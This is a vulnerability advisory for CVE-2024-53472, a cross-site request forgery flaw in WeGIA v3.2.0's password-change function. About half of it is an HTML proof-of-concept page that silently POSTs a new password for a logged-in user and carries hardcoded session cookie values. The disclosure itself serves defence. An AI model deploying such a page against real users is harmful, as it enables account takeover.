CVE-2024-53472:CSRF in control.php to change password

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

Affected Product Code Base

WeGIA - v3.2.0

Vulnerability Description

A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.

POC

This code allows an attacker to change the password of an authenticated user without their consent by loading this malicious page while the user is logged into the application.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit</title>
</head>
<body>
    <script>
        fetch("https://demo.wegia.org/controle/control.php", {
            method: "POST",
            headers: {
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": "_ga=GA1.1.1228908965.1730558983; PHPSESSID=1g73rg3pd1gp28a54amciflj9d; _ga_F8DXBXLV8J=GS1.1.1730838076.2.1.1730838109.27.0.0"
            },
            body: "senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
        })
        .then(response => response.text())
        .then(data => console.log(data))
        .catch(error => console.error('Error:', error));
    </script>
</body>
</html>

Reference

https://github.com/nilsonLazarin/WeGIA/issues/790

https://www.wegia.org

https://github.com/nilsonmori/WeGIA

Discoverer

Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.